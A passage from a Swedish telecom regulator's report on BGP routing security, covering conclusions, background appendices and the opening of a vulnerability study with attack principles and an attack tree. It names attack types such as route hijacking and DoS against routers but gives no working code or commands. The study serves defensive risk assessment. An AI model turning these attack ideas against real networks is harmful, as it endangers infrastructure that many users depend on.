http://www.cymru.com/Documents/secure-ios-template.html and
http://www.cymru.com/Documents/secure-bgp-template.html. The templates
have a bearing on the experiments conducted and we established that the
combination of updated software and configuration templates encompass the
cases studied in the experiments and should constitute a good starting point for
border router configuration. However, the templates cannot be regarded as a
finished solution and must be adapted and expanded according to local
conditions.
24
National Post and Telecom Agency
The protective measures that are mentioned most often are the following:
•
Infrastructure protection by means of lists of access controls, an Access
Control List (ACL): protection to prevent outsiders from contacting
routers and other equipment in the infrastructure
•
Deflecting and discarding malicious traffic
•
Spoofing protection: filtering in order to detect and discard traffic as far as
possible where the originator's address has been falsified
•
Filtering of BGP: filtering of prohibited addresses, 'bogons', i.e. unused
address blocks, and other false routes over peering connections.
Appendix 3, Section 4 contains a more detailed description of different
protective measures and BCPs.
In addition to books on routing design and configuration, the networking
company, Cisco, has published a series of reports in the form of white papers
with security advice called 'SAFE Blueprints'; among others, 'SAFE: Best
Practices for Securing Routing Protocols' is specifically aimed at routing
protocols. Several different types of attack and protective measure are
described here, such as protecting peering connections by encryption, routing
in relation to all external networks, filtering and flap damping. Examples of
areas dealt with include:
Types of attack:
•
Disrupting interconnection links (peering connections)
•
Falsifying routing information
•
Redirecting traffic to form a routing loop
•
Redirecting traffic to a 'black hole' – traffic disappears
•
Different types of DoS attack
•
Causing route flapping – reducing accessibility in the network
Protective measures:
•
Protection against router intrusion
•
Protection against intrusion in peering connections
•
Protection against false routers
•
Instructions in conjunction with authentication (via MD5)
National Post and Telecom Agency
25
Contents
•
Different protection and configuration instructions when connecting to
external networks
•
Filtering within the network
•
Future development of routing security
The American National Institute of Standards and Technology recently published
a draft of a report with security advice for configuring BGP. Different sector
organisations, for example NANOG, RIPE and APNIC, also have many lectures
with security advice at their conferences. Material from many previous lectures
can be found on the Web. Other websites, such as www.bgp4.as, have gathered
together a large number of documents and links to further information about
BGP, the routing system and security.
5.5
PTS is continuing to study and monitor developments
within the area
The simulations show that many users are affected if a stakeholder with a large
market share is attacked. This would be interesting for further study, in addition
to cases where stakeholders with a relatively small market share risk disrupting
stakeholders with larger market shares. Scenarios of this type should be discussed
with ISPs to see whether this corresponds with information in the Routing
Registry and whether in that case it is practically feasible to modify and improve
protection. Several initiatives are underway at present to create fundamentally
better protection by means of various forms of cryptographic protection of
information, but much work remains before a practical and feasible standard
solution is obtainable. PTS should follow the development of certain more
pragmatic proposals that have been made to improve the protection of
information in the routing system and which are based on methods to detect
incorrect information in the system.
26
National Post and Telecom Agency
6
Conclusions and proposals for increased security
The protocol that deals with interconnection between IP operators (BGP) has
fundamental conceptual inadequacies as regards information security.
Measures against other vulnerabilities that were discovered have successfully
been taken in the newer versions of software. Disseminating false routing
information through mistakes or by a malicious insider may cause traffic to be
redirected or blocked and have serious consequences for users. The
interconnection function may also be disrupted by external attacks, but up to
now only a limited number of individuals have sufficient skills to succeed
here.
Different types of filtering are used by operators to protect against false
routing information. This causes problems for large operators, as the filter
grows substantially and becomes difficult to maintain. This results in filters
either being insufficient or in there not being any filters at all. Attacks against
border routers that load the memory and processor can cause the
interconnection function to stop working and result in serious disruptions. If
a dominant Internet service provider is made into a source of false routing
information through an attack, our simulation tests show that the
consequences may result in up to 70% of end users being affected.
As regards the underlying transport protocol over which BGP is relayed,
namely the Transmission Control Protocol (TCP), the risk is relatively low for
attacks against this having any effect, as effective protective mechanisms have
been introduced.
The ongoing migration of circuit-switched traffic to packet-switched
technology in what is often called the 'Next Generation Network' or 'NGN'
will contribute to an increase in IP-based interconnection. Security in the IP
interconnection function will thus become increasingly important.
PTS intends to monitor the development of cryptographic solutions that
involve the traceability of information and ensure that it has not been
changed, as well as authorisation for disseminating routing information.
Based on the experiences gathered from our work, the following proposals are
made for operators:
•
Updated software should always be used in border routers to improve
security
•
There is a need for increased filtering to avoid falsified and inadequate
routing information being disseminated further
•
It is important that operators ensure that information about policy in the
Routing Registry is kept up-to-date to make adequate filtering easier
National Post and Telecom Agency
27
Contents
•
28
It is important that Internet service providers comply with existing
instructions and templates for the border routing system.
National Post and Telecom Agency
National Post and Telecom Agency
29
Bibliography
See References in Appendix 3, Section 7.
National Post and Telecom Agency
31
- BILAGA 1
Appendix 1 - Introduction to the Border Gateway
Protocol
Communication between BGP systems
A system for interconnection through border routing, that is, a 'BGP system',
starts by opening a connection across the Transmission Control Protocol (TCP)
to a BGP neighbour, that is, a service provider with whom an interconnection
agreement has been concluded and to whom there is a direct connection.
Opening messages identify the originator's AS and BGP identifiers and may also
contain authentication information to securely determine whether the information
comes from the AS that it claims to be. When the connection has been opened,
routing information is exchanged. The connection remains open and updates are
sent as necessary. In order to safeguard contact, periodic 'keep-alive' messages are
exchanged, usually every 30 seconds.
Advertising routes
The routers encompassed by the system regularly advertise information about
routes to their neighbours through 'UPDATE messages'. A border router in
AS 100 can, for example, be informed that the route to a certain destination takes
place through AS 555, AS 430 and AS 22. When AS 100 subsequently reports to
its neighbours, it adds its own number as the first number in the chain: AS 100,
AS 555, AS 430, AS 22, etc. This technology makes it easy to detect loops. If a
router receives an advertisement that includes its own AS number, this
advertisement is quite simply ignored.
Route aggregation
A technology known as 'aggregation', which is an amalgamation of routes, is used
to prevent routing tables becoming too large. This means that an Internet service
provider can advertise all of the networks and routing information of all of its
customers to the rest of the world in one block. Traffic from external AS is sent to
the operators' aggregating routers, which forward the traffic to the customers'
networks based on its own routing tables. For outgoing traffic, the customer's AS
informs the operator about the routes to the internal networks. The operators
then aggregate the routes under a prefix before they are advertised to the outside
world.
Withdrawal of routes
An established route is withdrawn if an update includes it in a list of withdrawn
routes. The same applies if an update contains a replacement route or if a BGP
system closes its connection. In this case, all routes will be deleted from this
system.
National Post and Telecom Agency
33
Contents - BILAGA 1
Route dampening
Virtually all BGP routers are subject to unnecessary route updating, that is,
information about the 'PATH' up to a certain network (prefix) due to fluctuations
further away in the Internet. 'Route dampening' is implemented to reduce the
consequences of this. This means that if a route viewed as unreliable is advertised,
the route is subsequently associated with a penalty. If routes appear, disappear or
change attributes, e.g. an AS-PATH with unreasonable intensity, the penalty is
increased. When the route no longer fluctuates, the penalty decreases
exponentially in time. Two border standards (dampening thresholds and
thresholds of reuse) regulate when the route may be accepted, used and
disseminated. In other words, the point is to prevent fluctuations from
overloading the routing system and from being disseminated and disrupting
routers further away. Routes do not only fluctuate due to attacks and incorrect
configurations. In some situations, planned interruptions are unavoidable; for
example, when upgrading or reconfiguring the router. For this reason, it is
important to try to identify realistic values for configuring route dampening. Most
people currently agree that the standard settings for route dampening are too
strict and several proposals have been presented for how route dampening should
be configured; for example, from RIPE.
34
National Post and Telecom Agency
- BILAGA 2
Appendix 2 - Exchange points
In Sweden, the Internet comprises many different networks that are owned and
administered by both domestic and foreign operators. Traffic between the
networks of two operators can be exchanged in the following ways:
•
•
•
by operators relaying traffic between each other via an own link ('direct
peering' or 'private peering')
by operators relaying traffic via exchange points in Sweden or abroad
by one of the operators being connected as a customer to the other
operator
Sweden has special national exchange points. These are run by Netnod in close
collaboration with SOF, a forum for Swedish Internet service providers. Netnod
is owned by the Foundation for Telematic Development (the TU Foundation).
Exchange points are currently located at four locations in Sweden: Stockholm,
Gothenburg, Malmö and Sundsvall. These exchange points are subject to high
security. They are located in rock shelters and are designed for high operational
reliability and availability, for example with redundant equipment and
connections. Netnod collaborates with Internet service providers by cooperating
in SOF and, for instance, having the following tasks:
•
•
•
•
•
purchasing communication equipment
leasing premises
leasing fibre links
concluding operating agreements
running other functions shared between operators, which are competitionneutral.
An exchange point only works well if all of the parties connected can decide with
whom they wish to or do not wish to exchange traffic. What is most important is
for the 'exchange point' to refrain from establishing a policy on who is to
exchange traffic with whom. In order to be connected to the shared exchange
points, Netnod requires the operator to live up to Netnod's definition of an
operator, namely, "the party running the operation within the field of the Internet
and which has its own AS number and does not use 'default routing' and accepts a
number of rules laid down by Netnod". These include:
•
•
•
•
•
the operator should publicise its routing policy, if possible by registering it
with RIPE NCC and other relevant Regional Internet Registries (RIR)
routing may not be exchanged over the exchange point with routing
protocols that utilise multicast or broadcast
static routing may not be used to direct traffic over the exchange point
AS numbers may only be used at an exchange point if they have been
coordinated and approved by Netnod
routing information exported to other destinations in the Internet may not
contain private AS numbers
National Post and Telecom Agency
35
Contents - BILAGA 2
•
36
traffic may only be sent to a destination for which an operator has agreed
in advance about the exchange of traffic.
National Post and Telecom Agency
- APPENDIX 3
Appendix 3 - Testing of vulnerabilities in the border
routing system
National Post and Telecom Agency
37
Contents - APPENDIX 3
Security in the border routing system:
A vulnerability analysis regarding the impact on Swedish
users
Michael Liljenstam
38
National Post and Telecom Agency
- APPENDIX 3
Abstract
The interdomain routing system is a critical part of the Internet infrastructure. Unfortunately,
the original design did not include mechanisms to secure the information in the system and, as
is the case for any equipment that is exposed in the network, there is the possibility of attacks.
Thus, vulnerabilities are currently known to exist and there is a great deal of interest in
improving the security of the routing system. This report describes experiments with routers
and simulation models to analyse the risks associated with a number of known and speculated
vulnerabilities. Security companies and equipment vendors are constantly searching for new
software vulnerabilities. To complement rather than duplicate these efforts, our focus here is to
study a few known vulnerabilities and study the risks in a broader perspective; that is, the
extent to which attacks might affect Swedish Internet users. The goal is partly to examine the
extent to which protection is available, partly to spread knowledge about protective measures,
and if possible determine the most effective defences in terms of reducing the potential number
of affected users.
The attack experiments with known attacks in lab networks indicate that certain types of threat,
for instance attacks against TCP connections to break or affect BGP peering sessions, are
significantly more difficult to carry out in practice than has previously been indicated in certain
reports. Newer software versions have improved the protocol implementations and include
some modifications to the treatment of key messages which makes it very difficult for an
attacker to succeed unless traffic on the link can be monitored. Additional protection of peering
connections can be afforded by MD5-based protection, although it appears to carry with it
some risks that the increased CPU load could be exploited for DoS attacks. Simple DoS attacks
targeting the infrastructure are a known phenomenon but have perhaps not received as much
attention as other types of attack (with the exception of the DNS root server attacks), but our
results indicate that they pose a more tangible threat than sequence number attacks against
TCP. Consequently, it is important to take appropriate security measures. With interest in
finding infrastructure vulnerabilities on the increase, it is now as important to run updated
software versions on infrastructure equipment as it is on workstations. However, in order to
protect against unknown vulnerabilities, it is also necessary to take other security measures,
and several Best Common Practices are available. Router configuration templates, created by
Team Cymru, were checked against the attacks that were tested in the experiments and were
found to constitute a good starting point. However, they have to be adapted to local conditions
and should be considered a minimum rather than a finished solution; and more advanced
measures, like complete isolation of control and management planes, are not discussed.
The simulations of potential consequences that were carried out were focused on studying
attacks based on the injection of false information into the system under the assumption that
the available policy information in the Routing Registry is used to provide as much defensive
filtering as possible. Half a dozen organisations were selected from a few different sectors and
a large number of different route-hijacking scenarios targeting these organisations were
simulated. Each scenario represented a different attack origin. Results for a deaggregation-type
of attack indicate that the consequences, in terms of the number of affected end users, do not
vary much between the different targets. On the other hand, user impact varies greatly with
attack origin as a result of filtering policies and varying AS influence in the network. The
results suggest that deaggregations by customer AS have a very small probability of impacting
on the system, thanks to extensive defensive filtering. The impact from attacks launched from
different Swedish ISP AS, on the other hand, varies from none (in about half the scenarios) up
to 60-70% of the end users being affected. However, due to market concentration there are
only a few scenarios that lead to extensive consequences, and for most scenarios fewer than
10% of users are affected. It is a known fact that current practices of defensive filtering do not
provide complete protection, as it is very difficult, in practice, to maintain large numbers of
filter definitions. However, the simulations point to specific scenarios that can potentially lead
to a large impact and it would be interesting to follow up the specifics with ISPs to validate the
National Post and Telecom Agency
39
Contents - APPENDIX 3
policy information from the Routing Registry and to determine whether it would be feasible to
introduce certain stricter filters for these specific scenarios. As a longer-term goal, it would be
better to strive for improved security support being incorporated into the protocols since
filtering cannot provide a complete solution and the coordination between different
organisations is difficult today.
40
National Post and Telecom Agency
- APPENDIX 3
Sammanfattning
Interdomän-routingsystemet är en kritisk funktion i Internetinfrastrukturen.Tyvärr innefattade
den ursprungliga konstruktionen inte något grundläggande stöd för att säkra informationen i
systemet, och som med all utrustning som exponeras på nätet finns möjligheten till attacker
som utnyttjar dolda sårbarheter i mjukvaran. Följaktligen finns vissa kända sårbarheter och på
senare tid har frågor runt hur säkerheten skulle kunna förbättras dragit till sig en hel del
intresse. Denna rapport beskriver experiment med fysisk utrustning och simuleringsmodeller
för att analysera risker förknippade med ett antal kända och spekulerade sårbarheter i
routingsystemet. Säkerhetsföretag och leverantörer letar ständigt efter oupptäckta sårbarheter.
För att komplettera, snarare än duplicera, dessa aktiviteter inriktade vi oss här på att studera
några redan kända sårbarheter och istället försöka se till riskerna i ett större perspektiv, dvs. i
vilken utsträckning de skulle kunna påverka svenska användare. Avsikten är alltså dels att
undersöka i vilken mån skyddsåtgärder finns för de kända sårbarheterna, att hjälpa till att
sprida kunskap om skyddsåtgärder som står till buds och bör tillämpas, samt att om möjligt
hitta åtgärder som ger det största utbytet i fråga om att minska antalet användare som skulle
kunna påverkas.
Utifrån de experiment som utfördes med kända attacker i labb-nät kan man konstatera att vissa
typer av hot, som t.ex. attacker mot TCP-förbindelser för att bryta eller påverka BGPförbindelser, är avsevärt svårare att genomföra i praktiken än vad som ibland tidigare
förespeglats. I nyare versioner av mjukvaran har också implementationen förbättrats och vissa
smärre modifieringar gjorts i hanteringen av meddelanden vilket gör det mycket svårt att
genomföra denna typ av attacker annat än om angriparen kan avlyssna trafiken på förbindelsen.
MD5-baserade skydd av peeringförbindelser tillför ytterligare skydd, även om det också
förefaller finnas en mindre risk för att ökad CPU-belastning skulle kunna utnyttjas vid
belastningsattacker. Belastningsattacker är ett känt fenomen som kanske inte uppmärksammats
så mycket när det gäller attacker mot infrastrukturen (utom i fallet då DNS-root-servrar
attackerades), men resultaten tyder på att detta är ett mer reellt hot än sekvensnummerattacker
mot TCP, varför det är viktigt att vidta skyddsåtgärder mot dessa. Över huvud taget kan man
konstatera att det nu är lika viktigt att uppdatera mjukvaran på routrar och
infrastrukturutrustning som på persondatorer, då fler och fler intresserar sig för att leta
sårbarheter även i infrastrukturen. För att skydda även mot ännu okända sårbarheter krävs
skyddsåtgärder, och ett flertal Best Common Practices finns att tillgå. Ett konkret förslag på en
startpunkt för routerkonfiguration skapat av team Cymru jämfördes med de attacker som testats
i experimenten och bör kunna utgöra en god utgångspunkt. De måste dock anpassas efter de
lokala förutsättningarna och bör betraktas mer som ett minimum än en färdig lösning; och mer
avancerade åtgärder som att t.ex. helt isolera kontroll- och management-plan berörs inte.
Simuleringarna av de potentiella följdverkningarna av attacker på nationell skala fokuserades
på att studera attacker som bygger på introduktion av falsk routinginformation i systemet,
under antagandet att tillgänglig information från routingregistret används i så hög grad som
möjligt för att uppnå bästa möjliga defensiva filtrering. Ett halvdussin organisationer valdes ut
för att representera några olika sektorer, och ruttkapningsattacker riktade mot dessa
simulerades i ett stort antal scenarier där utgångspunkten för attacken varierades. Resultaten för
deaggregeringar av prefix tyder på att konsekvenserna, i termer av hur stor andel av svenska
Internetanvändare som påverkas, inte varierar mycket mellan de olika målen. Vad som
däremot, i hög grad, påverkar konsekvensernas omfattning är varifrån attacken har sin
utgångspunkt, eftersom filtreringspolicies varierar i nätet och beror mycket på olika AS
position och inflytande. Resultaten från simuleringarna av prefix-deaggregeringar tyder på att
deaggregeringar från utpräglande kund-AS har mycket liten möjlighet att slå igenom i större
konsekvenser, tack vare utbredd defensiv filtrering mot kunder. Vid attacker utgående från AS
tillhörande svenska ISPer varierar konsekvenserna från att inga andra AS påverkas (i ungefär
hälften av fallen) till att upp till 60-70% av de svenska kunderna skulle kunna påverkas. På
grund av marknadskoncentration är det dock endast ett fåtal fall som leder till omfattande
National Post and Telecom Agency
41
Contents - APPENDIX 3
konsekvenser, och i de flesta fall påverkas färre än 10% av användarna. Det är ett känt faktum
att defensiv filtrering inte ger ett heltäckande skydd eftersom det i praktiken är mycket svårt att
underhålla stora mängder filter. Från simuleringarna kan man dock utläsa vissa specifika
scenarier som potentiellt kan leda till större konsekvenser, och det vore av intresse att följa upp
dessa med ISPer för att kontrollera om policyinformationen i routingregistret stämmer och om
det i så fall skulle vara praktiskt möjligt att introducera vissa striktare filter. På längre sikt vore
det bättre att verka för att säkerhet byggs in i protokollen, eftersom filtrering inte ger en
heltäckande lösning och koordinationen mellan organisationer är komplicerad idag.
42
National Post and Telecom Agency
- APPENDIX 3
Thanks!
We would like to express our gratitude to TeliaSonera AB and NSII for access to the
laboratory networks and their help with the experiments. We would also especially like to
thank Lars Axeland (Telia), Per Helm (Telia), Kurt-Erik Lindqvist (Netnod/NSII) and Peter
Löthberg (NSII/STUPI) for our rewarding discussions, and their views and comments.
National Post and Telecom Agency
43
Contents - APPENDIX 3
Contents
Introduction .................................................................................................................47
1
The interdomain routing system .......................................................................48
1.1 Known and potential vulnerabilities ............................................................48
1.2 Ongoing initiatives to improve security .......................................................48
1.3 Vulnerabilities considered by this study......................................................49
1.3.1
Attack principles ..........................................................................50
1.4 Protection principles....................................................................................54
1.4.1
Protecting routers ........................................................................54
1.4.2
Protecting routing information .....................................................56
2
Experiments in lab networks .............................................................................58
2.1 Initial experiments: lab network A ...............................................................58
2.1.1
Initial reconnaissance ..................................................................59
2.1.2
DoS with crafted packets.............................................................62
2.1.3
Attacks on a TCP coupler............................................................66
2.1.4
Traffic through slowpath ..............................................................70
2.1.5
Loading within the verification level.............................................71
2.1.6
Test of impact on performance as a result of security
mechanisms ................................................................................71
2.1.7
Testing which/how great a proportion of AS use flap
damping.......................................................................................71
2.2 Experiments in lab network B .....................................................................72
2.2.1
Initial reconnaissance ..................................................................72
2.2.2
DoS with crafted packets.............................................................76
2.2.3
Attacks on a TCP coupler............................................................76
2.2.4
Loading of input queue ................................................................77
2.2.5
Traffic through slowpath ..............................................................79
2.2.6
Tests of impact on performance as a result of security
mechanisms ................................................................................82
2.3 Experiments in lab network C .....................................................................85
2.3.1
Initial reconnaissance ..................................................................85
2.3.2
DoS with crafted packets.............................................................86
2.3.3
Traffic load to CPU ......................................................................86
2.4 Conclusions drawn from the lab network experiments ...............................90
2.4.1
Results of the experiments..........................................................90
2.4.2
Local and macroscopic consequences .......................................93
3
Best Common Practices.....................................................................................94
3.1 Some sources of general advice ................................................................94
3.2 Configuration templates ..............................................................................94
4
The Swedish routing system: a simulation model ..........................................98
4.1 Network topology ........................................................................................98
4.1.1
AS level topology.........................................................................98
4.1.2
Router level topology................................................................ 101
4.2 Functions critical to society...................................................................... 102
4.3 Market shares: Internet users .................................................................. 102
4.4 Network prefixes ...................................................................................... 103
4.5 BGP policy ............................................................................................... 103
4.6 Data flows ................................................................................................ 104
4.7 Validation ................................................................................................. 107
4.7.1
AS topology .............................................................................. 107
4.7.2
Router topology ........................................................................ 107
44
National Post and Telecom Agency
- APPENDIX 3
4.8
4.7.3
Market shares ...........................................................................108
4.7.4
Routing policy............................................................................108
4.7.5
Prefixes and routes ...................................................................108
Conclusions about validation....................................................................112
5
Simulation experiments ...................................................................................113
5.1 Advertising false routes ............................................................................113
5.1.1
Example scenarios: deaggregation from the AS of Swedish
ISPs...........................................................................................113
5.1.2
Systematic quantification: consequences of deaggregation
attacks .......................................................................................114
5.1.3
Systematic quantification: consequences of attacks using
existing prefixes ........................................................................118
5.2 Induced router crashes.............................................................................123
5.3 Discussion ................................................................................................125
6
Conclusions and recommendations...............................................................127
National Post and Telecom Agency
45
Contents - APPENDIX 3
46
National Post and Telecom Agency
- APPENDIX 3
Introduction
The routing system, a critical function. The routing system, together with the DNS system, is
an important logical subcomponent of the Internet infrastructure. A disruption in the routing
system can have serious consequences as traffic will not reach its destination without an
operational routing function. In other words, successfully manipulating the routing system
makes it possible to either block traffic to certain destinations or to redirect traffic without the
user's knowledge. This study aims to shed light on the risks associated with attacks exploiting
possible vulnerabilities in the routing system. Here, 'risk' means a combination of the
likelihood of a successful attack and the consequences brought about by the attack.
Limitations of the study. As there are other projects and sections at PTS's Network Security
Department actively working to safeguard the physical security of the Internet infrastructure,
this particular project focused on logical vulnerabilities. 'Logical vulnerabilities' refers to
vulnerabilities that can be exploited during attacks whose primary aim is not to physically
destroy or disrupt network equipment, but instead, for example, to manipulate control traffic or
to gain access to the equipment's command line interface.
The vulnerabilities or potential vulnerabilities that are discussed in the project encompass at a
high level:
• Manipulation of router configuration as a consequence of intrusion or with the help of
an insider
• Different types of DoS attack on border routers
• Disruption through exploitation of software vulnerabilities.
Method. The risk associated with a particular type of attack is a combination of the difficulty
of carrying out the attack and the consequences brought about by the attack. In order to gain a
better understanding of the known types of attack that have been described and speculated
about, a combination of experiments were conducted using physical router equipment in lab
networks and simulations to assess the large-scale impact.
Attack experiments in lab networks. The first step was to conduct an experiment using
known types of attack in three different lab networks so as to have a clear picture of the
conditions that exist to exploit known vulnerabilities. The experiment aimed first to provide
information about the level of difficulty in carrying out an attack, to check that the
vulnerabilities are rectified or assess the extent to which certain weaknesses may persist, and
finally to be able to classify the 'local' consequences of a attack being carried out; in other
words, how they affect the specific router being attacked. The local consequences are
subsequently extrapolated to the larger system by means of simulations. The attack
experiments also provide other forms of input data as regards the behaviour of the equipment
that is used as a basis of the simulations.
Simulations of attacks. A simulation model was developed to gain a better understanding of
the consequences of different attacks on a larger scale. This helped to measure the
consequences of different attack scenarios. The attacks varied as regards the type of attack as
well as the point at which attack entered the system. The model was designed to enable a
course of events in the routing system to be studied when certain organisations or sectors that
are critical to society are exposed to attacks (directed at the routing system) and to be able to
quantify the extent of Swedish Internet users that could be affected. We can estimate the risks
associated with the scenario with the help of this information together with a rough estimate of
the likelihood of an attack being successful. It is hoped that an improved understanding of the
relative risks may result in resources directed at improving security being prioritised in a
rational way to the areas where they are most worthwhile.
National Post and Telecom Agency
47
Contents - APPENDIX 3
Reading instructions. The remainder of this report is structured as follows: Section 1 starts
with a brief description of the interdomain routing system, a little about its known
vulnerabilities, and the attacks that were studied. Section 2 then describes the attack
experiments carried out in lab environments. Section 3 provides a number of sources for 'Best
Common Practices' in terms of routing security and how they relate to the attack experiments.
Section 4 describes how a simulation model of the routing system on a national level was
designed and validated, and Section 5 describes the simulation experiments that were carried
out to assess the possible consequences of the various attacks. Section 6 contains conclusions
and recommendations. Appendix E provides a list of the abbreviations used in this report.
1 The interdomain routing system
The Internet currently consists of more than 20 000 autonomous systems (AS). An AS is a
network controlled by an organisation's administrative function. However, for practical
reasons, some organisations with very large networks, such as the largest ISPs, have divided
their networks into several AS. Routing (traffic routing) takes place within an AS by means of
intradomain routing protocols, such as OSPF, IS-IS or EIGRP, which assess the shortest route
through the network. However, routing when traffic is exchanged between AS, that is,
'interdomain routing', is controlled in a different way. In this case, the primary aim is not to
identify the shortest route through the network but to be able to define policies for directing
traffic in accordance with the commercial agreements concluded concerning the exchange of
traffic between the organisations that own the different AS. The directing function is carried
out by means of the BGP ('Border Gateway Protocol') [1][2][3], which is the de facto standard
in the Internet, where policies can be specified in the form of filters and preferences between
available routes.
1.1
Known and potential vulnerabilities
When the BGP protocol was designed, no one took much account of the security aspects,
which has led to the current functions for border routing having certain well-known,
fundamental inadequacies as regards ensuring that information in the routing system is correct.
The AS 7007 incident in 1997 [4] is by far the most well-known case where incorrect routing
information leaked out and resulted in large-scale disruptions to the routing system. However,
this incident led to an increased understanding of BGP's lack of inbuilt security functions and
helped to initiate the development of proposals for new security mechanisms. Since then, a
number of systematic studies have also been carried out to analyse potential vulnerabilities in
the routing system, e.g. [5][6][7][8]. Recurring problems in these descriptions include:
• The lack of protection for the authenticity and integrity of routing messages
• The possibility of disrupting underlying protocols, particularly TCP
• Direct DoS attacks against routers in the network so as to disrupt the routing system
• The route flap dampening mechanism being potentially used by attackers so that
limited disruptions result in a more extensive loss of connectivity.
Vulnerabilities will be discussed in more detail in Section 1.3, where we discuss the
vulnerabilities studied in this report.
1.2
Ongoing initiatives to improve security
A number of initiatives have been taken to improve security in the routing system. Secure-BGP
(S-BGP) [7] was a well-known, early proposal to fundamentally improve the protection of the
information in the system. Its aim is to use cryptographic mechanisms to ensure that the route
information has the correct origin and that certain route attributes have not been manipulated
along the way. However, one significant practical problem is that, in addition to changes to the
protocol and the management of messages, some form of infrastructure is also required to
disseminate public keys to all routers ('Public Key Infrastructure' or PKI). It is technically
feasible to achieve such an infrastructure, but finding space for this is a practical problem and
having to decide which organisations should function as certificate issuers is an administrative
problem. As cryptographic verification is relatively complex and demanding in terms of
resources, there is also uncertainty about the impact of its introduction on performance, and
48
National Post and Telecom Agency
- APPENDIX 3
whether it would be possible from a practical point of view in routers that manage large
quantities of traffic in the core of the largest networks.
Secure Origin BGP (SoBGP) [10] is a somewhat simplified variant where the origin is
protected as well as certain characteristics of the attribute describing the route to it. The
intention is to reduce the resources needed for verification and thus have less of an impact on
performance. However, the system still needs a PKI. There is also a proposal to use other
cryptographic mechanisms that demand fewer resources in a protocol such as Secure Path
Vector (SPV) [11]. [5] provides a detailed description of various protocols and mechanisms
that have been proposed.
In practice, the defensive filtering1 of routing information is currently used based on
information exchange about policies via the Routing Registry. However, information in the
Routing Registry is inadequate due to shortcomings in the manual updates that are required to
keep the information correct and consistent. In other words, in practice it is difficult to achieve
comprehensive protection. More pragmatic methods have also been proposed for making
certain improvements to the existing system. These mainly involve attempting to discover false
routing information in real-time by, for example, verifying the prefix origin against the Routing
Registry [12] or by verifying information from other points in the system [13][14].
For a more long-term solution, the Internet Engineering Task Force (IETF) is also currently
drawing up requirements for security mechanisms in the next generation's routing system.
1.3
Vulnerabilities considered by this study
A number of compilation studies and vulnerability reports have been used, for example
[5][6][7][8][15], as a basis for the selection of vulnerabilities considered by this study. Rather
than search for new ones, we have chosen to focus on vulnerabilities that are already known
and have previously been publicised. There are two main reasons for this:
1. We would like to ensure that we have a good understanding of the risks identified,
that these risks have been remedied and that we know which protective measures
should be applied
2. It is clear that a number of stakeholders are striving to identify vulnerabilities (such as
suppliers, operators and security companies), but it is not apparent that any of these
stakeholders have the interest or resources needed to paint an overall picture of the
potential impact, for example at a national level. Thus, it appears better to supplement
ongoing work by attempting to use new methods to assess the risks on a larger scale.
However, this requires a good basic understanding of the vulnerabilities already
identified.
As this involves vulnerabilities that are already known, this means that vulnerabilities based on
implementation errors in software have been rectified, and new security functions have been
added to later versions of router operating systems in order to eliminate the problems.
However, the basic principles are of interest, as certain types of attack can be difficult to
completely protect against, and it cannot be ruled out that new vulnerabilities will be
discovered with characteristics similar to the previous ones. Also, it is a matter of ensuring that
all relevant network operators are aware of the known problems so that old vulnerable software
versions are not still being used and so that the protective mechanisms that are available are
utilised optimally.
When reviewing the known vulnerabilities, we focused on Cisco equipment, since Cisco has a
strong market position and such equipment can therefore be expected to constitute a large part
of existing installations.
'Defensive filtering' refers to filters whose aim is to protect against (i.e. filter out) incorrect
information rather than manage the intended routing information.
1
National Post and Telecom Agency
49
Contents - APPENDIX 3
In general, the attacks that can be carried out and their impact will depend on the protective
measures that are applied in the network and the resources and powers that opponents have at
their disposal. Subsequently, it would be suitable to vary these parameters in order to assess
how different Best Common Practices (BCPs) for network construction and operation could
have an impact on the network's resilience to attacks. A limited range of assumptions is made
here about the configuration of routers in the network, as it is not possible to carry out an
exhaustive investigation due to the large number of combination possibilities.
As a 'threat profile' [5], we have chosen to have an attacker attempt to disrupt the routing
system, either by redirecting traffic or simply by generating a 'Denial-of-Service' (DoS) attack
against an organisation or more broadly within the Swedish network. It is assumed that this can
be achieved through attacks against, for example, the integrity of the BGP message, the TCP
coupler, disruption of border routers, etc. Other potential threat profiles, such as threats to the
possible confidentiality of routing information, are not taken into account. First, we discuss the
various points of attack that are known about and then we briefly discuss protection.
1.3.1 Attack principles
To sum up, the routing system can also be attacked indirectly through attacks on various layers
of the protocol stack. This is illustrated with some examples in Figure 1 below.
OSI
- routing-attacker
(BGP, IGP)
- SNMP-attacker
- (konfigurations-)
http-serverattack
...
TCP/IP
7. Applikations-nivå
6. Presentations-nivå
Applikations-nivå
- TCP-attacker
...
5. Session-nivå
4. Transport-nivå
Transport-nivå
3. Nätverks-nivå
Nätverks-nivå
2. Länk-nivå
Länk-nivå
1. Fysisk nivå
Fysisk nivå
[Text for diagram above:
OSI
7. Application level
6. Presentation level
5. Session level
4. Transport level
3. Network level
2. Link level
1. Physical level
TCP/IP
Application level
Transport level
Network level
Link level
Physical level
- ICMP-attacker
...
- ARP-attacker
- DHCP-attacker
...
- routing attacks
(BGP, IGP)
-SNMP attacks
- (configuration)
http-server attacks
- TCP attacks
- ICMP attacks
- ARP attacks
- DHCP attacks]
Figure 1. Attacks against various protocol levels can indirectly affect the routing system
50
National Post and Telecom Agency
- APPENDIX 3
These different possibilities give rise to a complex system of dependencies between the
different possible combinations of attacks in order to achieve a certain aim. This is often
illustrated in the form of an attack tree. Figure 2 below shows an attack tree with the aim of
disrupting or influencing a peering session based on known, potential vulnerabilities. This lays
the foundation for the experiments in the different lab networks. The tree is actually two trees
with the ultimate goals of 'disrupting the peering connection' (this mainly pertains to DoS) and
'injecting false route information'. The injection of false information requires the successful
manipulation of the BGP configuration or messages by the attacker. The verification level' here
refers to the capacity to manipulate messages within the routing protocol. There are a number
of attacks at the traffic level, which are easier to carry out as they are based on sending traffic
to or through the router in order to cause disruptions (DoS). The practical experiments
primarily focused on DoS-related attacks as it is assumed that these will be somewhat easier to
carry out from the outside and will not require as much effort to investigate the function of the
OS code, 'social engineering' or the like.
The 'BGP Vulnerability Testing: Separating Fact from FUD' study [16], presented at NANOG
and quoted in the 'exjobb' report, indicated that general attacks against the TCP coupler, which
were observed relatively recently, are difficult to carry out in practice, particularly if BCPs are
applied. On the other hand, other investigations [17] point out that the possibility of relatively
simple attacks against routers, such as password guessing, should probably not be ruled out,
even if the application of certain strict BCPs can make it much more difficult or virtually
impossible for an attacker to reach routers in the infrastructure.
It is also worth noting that until very recently it was assumed virtually impossible to achieve in
practice a 'shellcode' initiated from a distance against a Cisco router, i.e. an attack code that
opens up a configuration shell for the attacker on the machine by exploiting a vulnerability.
However, this possibility was demonstrated at the Black Hat Briefings conference [18] in 2005.
National Post and Telecom Agency
